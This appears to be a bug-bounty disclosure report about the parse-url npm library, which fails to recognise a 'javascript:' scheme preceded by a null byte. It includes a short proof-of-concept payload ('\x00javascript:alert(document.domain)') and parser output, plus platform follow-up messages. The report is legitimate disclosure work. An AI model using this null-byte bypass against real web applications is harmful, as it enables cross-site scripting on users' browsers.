Improper Input Validation in ionicabizau/parse-url
Valid
Reported on
Feb 24th 2022
Description
If an attacker inserts a null byte at the beginning of the javascript scheme, parse will not parse the javascript scheme properly. Therefore, all null bytes must be removed before parsing.
Proof of Concept
const parseUrl = require("parse-url")
url = parseUrl("\x00javascript:alert(document.domain)") // unreported
console.log(url)
output
{
protocols: [],
protocol: 'ssh',
port: null,
resource: '\u0000javascript',
user: '',
pathname: '/alert(document.domain)',
hash: '',
search: '',
href: '\u0000javascript:alert(document.domain)',
query: [Object: null prototype] {}
}
location.href = '\u0000javascript:alert(document.domain)'
This works fine in browsers!
References
We are processing your report and will contact the
ionicabizau/parse-url
team within 24 hours.
5 months ago
const parser = require('url-parse');
console.log(parser("\x00javascript:alert(document.domain)"))
output
{
slashes: false,
protocol: 'javascript:',
hash: '',
query: '',
pathname: 'alert(document.domain)',
auth: '',
host: '',
port: '',
hostname: '',
password: '',
username: '',
origin: 'null',
href: 'javascript:alert(document.domain)'
}
Above is the return value of the unshiftio/url-parse module.
We have sent a
fix follow up to the
ionicabizau/parse-url
team.
We will try again in 7 days.
5 months ago
We have sent a
second
fix follow up to the
ionicabizau/parse-url
team.
We will try again in 10 days.
5 months ago
We have sent a
third and final
fix follow up to the
ionicabizau/parse-url
team.
This report is now considered stale.
5 months ago
Ionică Bizău (Johnny B.)
has been awarded the fix bounty
to join this conversation